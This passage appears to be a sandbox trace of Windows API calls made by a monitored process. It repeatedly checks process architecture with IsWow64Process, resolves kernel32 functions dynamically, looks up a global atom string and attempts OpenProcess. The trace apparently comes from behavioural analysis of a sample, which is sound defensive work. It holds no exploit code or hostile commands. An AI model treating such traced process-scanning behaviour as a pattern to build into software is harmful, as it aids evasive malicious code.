	[0141.690] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.690] CloseHandle (hObject=0x2dc) returned 1
	[0141.690] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.690] CloseHandle (hObject=0x2dc) returned 1
	[0141.690] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.690] CloseHandle (hObject=0x2dc) returned 1
	[0141.691] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.691] CloseHandle (hObject=0x2dc) returned 1
	[0141.691] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.691] CloseHandle (hObject=0x2dc) returned 1
	[0141.691] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.691] CloseHandle (hObject=0x2dc) returned 1
	[0141.691] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.691] CloseHandle (hObject=0x2dc) returned 1
	[0141.692] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.692] CloseHandle (hObject=0x2dc) returned 1
	[0141.692] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.692] CloseHandle (hObject=0x2dc) returned 1
	[0141.692] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.692] CloseHandle (hObject=0x2dc) returned 1
	[0141.692] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.692] CloseHandle (hObject=0x2dc) returned 1
	[0141.693] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.693] CloseHandle (hObject=0x2dc) returned 1
	[0141.693] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.693] CloseHandle (hObject=0x2dc) returned 1
	[0141.693] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.693] CloseHandle (hObject=0x2dc) returned 1
	[0141.693] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.694] CloseHandle (hObject=0x2dc) returned 1
	[0141.694] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.694] CloseHandle (hObject=0x2dc) returned 1
	[0141.694] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.694] CloseHandle (hObject=0x2dc) returned 1
	[0141.694] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.694] CloseHandle (hObject=0x2dc) returned 1
	[0141.695] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.695] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0141.695] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0141.695] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.696] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0141.696] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.696] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0141.696] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0141.696] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0141.696] CloseHandle (hObject=0x2dc) returned 1
	[0141.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0141.696] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.697] CloseHandle (hObject=0x2dc) returned 1
	[0141.697] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.697] CloseHandle (hObject=0x2dc) returned 1
	[0141.697] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.697] CloseHandle (hObject=0x2dc) returned 1
	[0141.697] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.697] CloseHandle (hObject=0x2dc) returned 1
	[0141.698] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.698] CloseHandle (hObject=0x2dc) returned 1
	[0141.731] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.731] CloseHandle (hObject=0x2dc) returned 1
	[0141.732] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.732] CloseHandle (hObject=0x2dc) returned 1
	[0141.732] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.732] CloseHandle (hObject=0x2dc) returned 1
	[0141.732] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.732] CloseHandle (hObject=0x2dc) returned 1
	[0141.732] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.733] CloseHandle (hObject=0x2dc) returned 1
	[0141.733] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.733] CloseHandle (hObject=0x2dc) returned 1
	[0141.733] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.733] CloseHandle (hObject=0x2dc) returned 1
	[0141.733] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.733] CloseHandle (hObject=0x2dc) returned 1
	[0141.734] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.734] CloseHandle (hObject=0x2dc) returned 1
	[0141.734] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.734] CloseHandle (hObject=0x2dc) returned 1
	[0141.734] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.734] CloseHandle (hObject=0x2dc) returned 1
	[0141.734] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.734] CloseHandle (hObject=0x2dc) returned 1
	[0141.735] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.735] CloseHandle (hObject=0x2dc) returned 1
	[0141.735] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.735] CloseHandle (hObject=0x2dc) returned 1
	[0141.735] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.735] CloseHandle (hObject=0x2dc) returned 1
	[0141.735] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.735] CloseHandle (hObject=0x2dc) returned 1
	[0141.736] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.736] CloseHandle (hObject=0x2dc) returned 1
	[0141.736] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.736] CloseHandle (hObject=0x2dc) returned 1
	[0141.736] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.736] CloseHandle (hObject=0x2dc) returned 1
	[0141.736] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.736] CloseHandle (hObject=0x2dc) returned 1
	[0141.737] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.737] CloseHandle (hObject=0x2dc) returned 1
	[0141.737] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.737] CloseHandle (hObject=0x2dc) returned 1
	[0141.737] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.737] CloseHandle (hObject=0x2dc) returned 1
	[0141.737] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.737] CloseHandle (hObject=0x2dc) returned 1
	[0141.738] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.738] CloseHandle (hObject=0x2dc) returned 1
	[0141.738] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.738] CloseHandle (hObject=0x2dc) returned 1
	[0141.738] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.738] CloseHandle (hObject=0x2dc) returned 1
	[0141.738] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.738] CloseHandle (hObject=0x2dc) returned 1
	[0141.739] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.739] CloseHandle (hObject=0x2dc) returned 1
	[0141.739] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.739] CloseHandle (hObject=0x2dc) returned 1
	[0141.739] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.740] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0141.740] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0141.740] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.740] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0141.740] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.741] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0141.741] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0141.741] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0141.741] CloseHandle (hObject=0x2dc) returned 1
	[0141.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0141.741] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.741] CloseHandle (hObject=0x2dc) returned 1
	[0141.741] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.742] CloseHandle (hObject=0x2dc) returned 1
	[0141.742] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.742] CloseHandle (hObject=0x2dc) returned 1
	[0141.742] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.742] CloseHandle (hObject=0x2dc) returned 1
	[0141.742] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.742] CloseHandle (hObject=0x2dc) returned 1
	[0141.775] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.775] CloseHandle (hObject=0x2dc) returned 1
	[0141.775] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.775] CloseHandle (hObject=0x2dc) returned 1
	[0141.775] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.775] CloseHandle (hObject=0x2dc) returned 1
	[0141.775] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.776] CloseHandle (hObject=0x2dc) returned 1
	[0141.776] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.776] CloseHandle (hObject=0x2dc) returned 1
	[0141.776] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.776] CloseHandle (hObject=0x2dc) returned 1
	[0141.776] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.776] CloseHandle (hObject=0x2dc) returned 1
	[0141.776] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.777] CloseHandle (hObject=0x2dc) returned 1
	[0141.777] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.777] CloseHandle (hObject=0x2dc) returned 1
	[0141.777] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.777] CloseHandle (hObject=0x2dc) returned 1
	[0141.777] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.777] CloseHandle (hObject=0x2dc) returned 1
	[0141.778] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.778] CloseHandle (hObject=0x2dc) returned 1
	[0141.778] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.778] CloseHandle (hObject=0x2dc) returned 1
	[0141.778] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.778] CloseHandle (hObject=0x2dc) returned 1
	[0141.778] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.778] CloseHandle (hObject=0x2dc) returned 1
	[0141.779] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.779] CloseHandle (hObject=0x2dc) returned 1
	[0141.779] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.779] CloseHandle (hObject=0x2dc) returned 1
	[0141.779] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.779] CloseHandle (hObject=0x2dc) returned 1
	[0141.779] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.780] CloseHandle (hObject=0x2dc) returned 1
	[0141.780] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.780] CloseHandle (hObject=0x2dc) returned 1
	[0141.780] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.780] CloseHandle (hObject=0x2dc) returned 1
	[0141.780] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.780] CloseHandle (hObject=0x2dc) returned 1
	[0141.780] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.781] CloseHandle (hObject=0x2dc) returned 1
	[0141.781] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.781] CloseHandle (hObject=0x2dc) returned 1
	[0141.781] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.781] CloseHandle (hObject=0x2dc) returned 1
	[0141.781] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.781] CloseHandle (hObject=0x2dc) returned 1
	[0141.782] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.782] CloseHandle (hObject=0x2dc) returned 1
	[0141.782] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.782] CloseHandle (hObject=0x2dc) returned 1
	[0141.782] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.782] CloseHandle (hObject=0x2dc) returned 1
	[0141.782] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.782] CloseHandle (hObject=0x2dc) returned 1
	[0141.783] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.783] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0141.783] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0141.783] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.784] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0141.784] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.784] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0141.784] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0141.784] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0141.784] CloseHandle (hObject=0x2dc) returned 1
	[0141.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0141.784] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.784] CloseHandle (hObject=0x2dc) returned 1
	[0141.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.785] CloseHandle (hObject=0x2dc) returned 1
	[0141.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.785] CloseHandle (hObject=0x2dc) returned 1
	[0141.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.785] CloseHandle (hObject=0x2dc) returned 1
	[0141.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.786] CloseHandle (hObject=0x2dc) returned 1
	[0141.818] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.818] CloseHandle (hObject=0x2dc) returned 1
	[0141.818] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.818] CloseHandle (hObject=0x2dc) returned 1
	[0141.819] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.819] CloseHandle (hObject=0x2dc) returned 1
	[0141.819] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.819] CloseHandle (hObject=0x2dc) returned 1
	[0141.819] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.819] CloseHandle (hObject=0x2dc) returned 1
	[0141.819] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.820] CloseHandle (hObject=0x2dc) returned 1
	[0141.820] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.820] CloseHandle (hObject=0x2dc) returned 1
	[0141.820] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.820] CloseHandle (hObject=0x2dc) returned 1
	[0141.820] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.820] CloseHandle (hObject=0x2dc) returned 1
	[0141.821] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.821] CloseHandle (hObject=0x2dc) returned 1
	[0141.821] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.821] CloseHandle (hObject=0x2dc) returned 1
	[0141.821] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.821] CloseHandle (hObject=0x2dc) returned 1
	[0141.821] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.821] CloseHandle (hObject=0x2dc) returned 1
	[0141.822] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.822] CloseHandle (hObject=0x2dc) returned 1
	[0141.822] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.822] CloseHandle (hObject=0x2dc) returned 1
	[0141.822] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.822] CloseHandle (hObject=0x2dc) returned 1
	[0141.822] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.822] CloseHandle (hObject=0x2dc) returned 1
	[0141.823] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.823] CloseHandle (hObject=0x2dc) returned 1
	[0141.823] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.823] CloseHandle (hObject=0x2dc) returned 1
	[0141.823] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.823] CloseHandle (hObject=0x2dc) returned 1
	[0141.823] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.823] CloseHandle (hObject=0x2dc) returned 1
	[0141.824] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.824] CloseHandle (hObject=0x2dc) returned 1
	[0141.824] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.824] CloseHandle (hObject=0x2dc) returned 1
	[0141.824] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.824] CloseHandle (hObject=0x2dc) returned 1
	[0141.824] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.824] CloseHandle (hObject=0x2dc) returned 1
	[0141.825] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.825] CloseHandle (hObject=0x2dc) returned 1
	[0141.825] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.825] CloseHandle (hObject=0x2dc) returned 1
	[0141.825] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.825] CloseHandle (hObject=0x2dc) returned 1
	[0141.825] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.826] CloseHandle (hObject=0x2dc) returned 1
	[0141.826] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.826] CloseHandle (hObject=0x2dc) returned 1
	[0141.826] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.826] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0141.826] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0141.827] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.827] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0141.827] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0141.827] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0141.827] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0141.827] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0141.828] CloseHandle (hObject=0x2dc) returned 1
	[0141.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0141.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.828] CloseHandle (hObject=0x2dc) returned 1
	[0141.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.828] CloseHandle (hObject=0x2dc) returned 1
	[0141.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.828] CloseHandle (hObject=0x2dc) returned 1
	[0141.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.829] CloseHandle (hObject=0x2dc) returned 1
	[0141.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.829] CloseHandle (hObject=0x2dc) returned 1
	[0141.862] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.862] CloseHandle (hObject=0x2dc) returned 1
	[0141.862] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.862] CloseHandle (hObject=0x2dc) returned 1
	[0141.863] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.863] CloseHandle (hObject=0x2dc) returned 1
	[0141.863] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.863] CloseHandle (hObject=0x2dc) returned 1
	[0141.863] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.863] CloseHandle (hObject=0x2dc) returned 1
	[0141.863] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.864] CloseHandle (hObject=0x2dc) returned 1
	[0141.864] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0141.864] CloseHandle (hObject=0x2dc) returned 1
